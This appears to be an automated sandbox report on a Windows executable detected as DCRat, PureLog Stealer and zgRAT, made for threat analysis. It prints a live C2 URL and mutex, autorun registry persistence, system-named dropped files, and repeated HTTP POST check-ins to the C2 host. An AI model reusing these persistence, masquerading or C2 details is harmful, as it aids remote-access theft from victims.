Windows Analysis Report
jW5TA1J9Z1.exe

Overview

General Information

Sample name: jW5TA1J9Z1.exe (renamed because original name is a hash value)
Original sample name: 910284D590BDF27BBEEDBDE3F3A2A94D.exe
Analysis ID: 1496460
MD5: 910284d590bdf27bbeedbde3f3a2a94d
SHA1: 6561ef1e4b2521aaf86f03ab791ac5ed6c4af7d0
SHA256: 6a397c6e1041ad55295c3fe2cf7f795da853004c1a02e1d77c65f0da86ad312e
Tags: DCRat, exe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops PE files with benign system names
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • jW5TA1J9Z1.exe (PID: 3036 cmdline: "C:\Users\user\Desktop\jW5TA1J9Z1.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
    • csc.exe (PID: 6208 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 400 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 7300 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7400 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE4ED.tmp" "c:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • cmd.exe (PID: 7520 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7568 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7584 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • jW5TA1J9Z1.exe (PID: 7840 cmdline: "C:\Users\user\Desktop\jW5TA1J9Z1.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • RuntimeBroker.exe (PID: 7964 cmdline: "C:\Windows\DiagTrack\RuntimeBroker.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • dwm.exe (PID: 180 cmdline: "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • MQYzEFytUKABjmoxvNTPTwUrcL.exe (PID: 4904 cmdline: "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • jW5TA1J9Z1.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\jW5TA1J9Z1.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • RuntimeBroker.exe (PID: 3824 cmdline: "C:\Windows\DiagTrack\RuntimeBroker.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • dwm.exe (PID: 1860 cmdline: "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • MQYzEFytUKABjmoxvNTPTwUrcL.exe (PID: 7916 cmdline: "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • jW5TA1J9Z1.exe (PID: 7032 cmdline: "C:\Users\user\Desktop\jW5TA1J9Z1.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • RuntimeBroker.exe (PID: 4580 cmdline: "C:\Windows\DiagTrack\RuntimeBroker.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • dwm.exe (PID: 2436 cmdline: "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • MQYzEFytUKABjmoxvNTPTwUrcL.exe (PID: 5368 cmdline: "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • jW5TA1J9Z1.exe (PID: 5664 cmdline: "C:\Users\user\Desktop\jW5TA1J9Z1.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • cleanup
{"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-NUz87R2ScA5J4vD9Ssui", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
jW5TA1J9Z1.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
jW5TA1J9Z1.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Windows\AppReadiness\RuntimeBroker.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Windows\AppReadiness\RuntimeBroker.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Windows\AppReadiness\RuntimeBroker.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000017.00000002.2519392668.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000000.1237730669.0000000000632000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1296629058.0000000012F88000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000017.00000002.2519392668.0000000002F28000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000017.00000002.2519392668.00000000028D2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.jW5TA1J9Z1.exe.630000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.jW5TA1J9Z1.exe.630000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\jW5TA1J9Z1.exe, ProcessId: 3036, TargetFilename: C:\Windows\DiagTrack\RuntimeBroker.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Windows\DiagTrack\RuntimeBroker.exe" , CommandLine: "C:\Windows\DiagTrack\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\DiagTrack\RuntimeBroker.exe, NewProcessName: C:\Windows\DiagTrack\RuntimeBroker.exe, OriginalFileName: C:\Windows\DiagTrack\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\DiagTrack\RuntimeBroker.exe" , ProcessId: 7964, ProcessName: RuntimeBroker.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Windows\AppReadiness\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\jW5TA1J9Z1.exe, ProcessId: 3036, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Windows\AppReadiness\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\jW5TA1J9Z1.exe, ProcessId: 3036, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\jW5TA1J9Z1.exe", ParentImage: C:\Users\user\Desktop\jW5TA1J9Z1.exe, ParentProcessId: 3036, ParentProcessName: jW5TA1J9Z1.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline", ProcessId: 6208, ProcessName: csc.exe
Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 6208, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP", ProcessId: 400, ProcessName: cvtres.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\jW5TA1J9Z1.exe, ProcessId: 3036, TargetFilename: C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\jW5TA1J9Z1.exe", ParentImage: C:\Users\user\Desktop\jW5TA1J9Z1.exe, ParentProcessId: 3036, ParentProcessName: jW5TA1J9Z1.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline", ProcessId: 6208, ProcessName: csc.exe
Timestamp: 2024-08-21T10:03:04.099115+0200
SID: 2048095
Severity: 1
Source Port: 49709
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: jW5TA1J9Z1.exe | Avira: detected
Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Windows\AppReadiness\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\DVfmUYdt.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Windows\AppReadiness\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\oANPimHy.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\umLWkwXM.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\dMjZyaMQ.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: 00000000.00000002.1296629058.0000000012F88000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-NUz87R2ScA5J4vD9Ssui", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe | ReversingLabs: Detection: 73%
Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\DVfmUYdt.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\UiajPhxi.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\kDsGBTSe.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\oANPimHy.log | ReversingLabs: Detection: 70%
Source: C:\Windows\AppReadiness\RuntimeBroker.exe | ReversingLabs: Detection: 73%
Source: C:\Windows\DiagTrack\RuntimeBroker.exe | ReversingLabs: Detection: 73%
Source: C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exe | ReversingLabs: Detection: 73%
Source: jW5TA1J9Z1.exe | ReversingLabs: Detection: 73%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\bakRRaCx.log | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe | Joe Sandbox ML: detected
Source: C:\Windows\AppReadiness\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\DVfmUYdt.log | Joe Sandbox ML: detected
Source: C:\Windows\AppReadiness\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\oANPimHy.log | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\LzHTfErB.log | Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe | Joe Sandbox ML: detected
Source: jW5TA1J9Z1.exe | Joe Sandbox ML: detected
Source: jW5TA1J9Z1.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | Directory created: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | Directory created: C:\Program Files\7-Zip\Lang\3b1a2dfabaeac3
Source: jW5TA1J9Z1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.pdb source: jW5TA1J9Z1.exe, 00000000.00000002.1293145015.0000000003547000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.pdb source: jW5TA1J9Z1.exe, 00000000.00000002.1293145015.0000000003547000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File opened: C:\Users\user\Desktop\desktop.ini

Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49709 -> 80.211.144.156:80
Source: Joe Sandbox View | ASN Name: ARUBA-ASNIT ARUBA-ASNIT
Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 373292cm.nyashka.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 373292cm.nyashka.top | Content-Length: 384 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 373292cm.nyashka.top | Content-Length: 2544 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 373292cm.nyashka.top | Content-Length: 1868 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 373292cm.nyashka.top | Content-Length: 2544 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 373292cm.nyashka.top | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 373292cm.nyashka.top | Content-Length: 1852 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 373292cm.nyashka.top | Content-Length: 1844 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 373292cm.nyashka.top | Content-Length: 2536 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 373292cm.nyashka.top | Content-Length: 1868 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global traffic HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 373292cm.nyashka.top Content-Length: 1844 Expect: 100-continue Connection: Keep-Alive
                              Source: global traffic HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 373292cm.nyashka.top Content-Length: 156172 Expect: 100-continue Connection: Keep-Alive
                              Source: global traffic HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 373292cm.nyashka.top Content-Length: 2532 Expect: 100-continue
                              Source: global traffic HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 373292cm.nyashka.top Content-Length: 2536 Expect: 100-continue
                              Source: global traffic HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 373292cm.nyashka.top Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
